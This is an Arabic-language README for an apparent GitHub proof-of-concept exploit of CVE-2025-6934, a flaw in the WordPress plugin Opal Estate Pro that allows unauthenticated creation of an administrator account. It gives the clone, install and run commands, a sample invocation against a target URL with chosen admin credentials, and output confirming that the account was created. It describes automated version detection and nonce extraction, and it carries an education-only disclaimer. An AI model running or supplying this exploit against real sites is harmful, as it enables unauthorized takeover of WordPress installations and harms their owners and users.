
إثبات المفهوم لاستغلال ثغرة CVE-2025-6934، وهي ثغرة حرجة في إضافة WordPress Opal Estate Pro تتيح إنشاء حساب مسؤول دون مصادقة. يشمل اكتشاف الإصدار تلقائيًا، واستخراج nonce، واستغلال نقطة النهاية AJAX.
📖 الوصف
يحتوي هذا المستودع على إثبات المفهوم (PoC) exploit لـ CVE-2025-6934،
ثغرة حرجة في إضافة WordPress: Opal Estate Pro <= 1.7.5، تسمح بإنشاء حساب مدير دون مصادقة.
⚠️ إخلاء مسؤولية: هذه الأداة متوفرة فقط لأغراض تعليمية وبحثية أمنية.
المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار ناتجة.
readme.txtاستنساخ المستودع وتثبيت التبعيات:
git clone https://github.com/yukinime/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
شغّل السكريبت مع هدفك:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ مثال للإخراج:
[✔] Eksploitasi Berhasil!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator
Screenshot Eksploitasi
Cyberlone Indonesia (Cyberlone)
هذا المشروع مرخص بموجب MIT License – انظر LICENSE للتفاصيل.